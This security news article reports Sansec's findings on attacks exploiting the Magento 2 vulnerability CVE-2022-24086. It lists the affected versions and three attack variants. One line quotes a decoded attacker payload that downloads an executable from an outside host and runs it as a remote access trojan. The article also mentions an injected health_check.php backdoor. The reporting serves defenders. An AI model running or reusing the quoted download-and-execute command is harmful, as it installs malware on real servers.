Surge in Magento 2 template attacks exploiting the CVE-2022-24086 flaw

Sansec researchers warn of a surge in hacking attempts targeting a critical Magento 2 vulnerability tracked as CVE-2022-24086.

Sansec researchers are warning of a hacking campaign targeting the CVE-2022-24086 Magento 2 vulnerability.

Magento is a popular open-source e-commerce platform owned by Adobe, which is used by hundreds of thousands of e-stores worldwide.

In February, Adobe rolled out security updates to address the critical CVE-2022-24086 flaw affecting its Commerce and Magento Open Source products, at the time, the company confirmed it was actively exploited in the wild.

“Adobe is aware that CVE-2022-24086 has been exploited in the wild in very limited attacks targeting Adobe Commerce merchants.” reads the advisory published by Adobe.

The flaw is an “improper input validation” vulnerability that could be exploited by threat actors with administrative privileges to achieve arbitrary code execution on vulnerable systems.

The CVE-2022-24086 has received a CVSS score of 9.8 out of 10, it is classified as a pre-authentication issue which means that it could be exploited without credentials.   

The vulnerability affects the following versions of the products:

PRODUCT	VERSION	PLATFORM
Adobe Commerce	2.4.3-p1 and earlier versions	All
2.3.7-p2 and earlier versions	All
Magento Open Source	2.4.3-p1 and earlier versions	All
2.3.7-p2 and earlier versions	All

Adobe Commerce 2.3.3 and lower are not affected by this vulnerability.

A few days after its disclosure, Positive Technologies researchers created a working PoC exploit for the vulnerability.

Now Sansec researchers are warning of a new wave of attacks targeting the Magento 2 vulnerability, the security firm detailed

Sansec’s researchers have detailed three attack variants exploiting CVE-2022-24086 to inject a malware on vulnerable systems. All the attacks analyzed by the security firm have been interactive, possibly because the Magento checkout flow is very hard to automate.

The first attack pattern detailed by the experts starts by creating a new customer account and an order placement on the vulnerable system. The attackers use a malicious template code in the first and last names and to place the order.

“It starts with the creation of a new customer account and an order placement, which may result in a failed payment.” reads the Sansec report. “The sales_order_address table now contains a record with malicious template code, which decodes to:

cd pub;cd media;curl https://theroots.in/pub/media/avatar/223sam.jpg -o cli &&chmod +x cli&&./cli;

The code downloads a Linux executable called “223sam.jpg” and launches it as a background process called cli, which is a Remote Access Trojan (RAT). The malware run in memory and creates a state file lg000, then polls a remote server hosted in Bulgaria for commands.

Experts pointed out that the RAT has full access to the database and the running PHP processes.

Sansec detailed a variant of the above attack, which injects the health_check.php backdoor. The attacker injects the placed order containing a specific template code in the VAT field.

The code creates a the file “pub/media/health_check.php” that accepts commands via POST requests.

A third attack variation of the attack replaces generated/code/Magento/Framework/App/FrontController/Interceptor.php with a tainted version.

Follow me on Twitter: @securityaffairs and Facebook

[adrotate banner=”9″]

[adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, Log4Shell)

[adrotate banner=”5″]

[adrotate banner=”13″]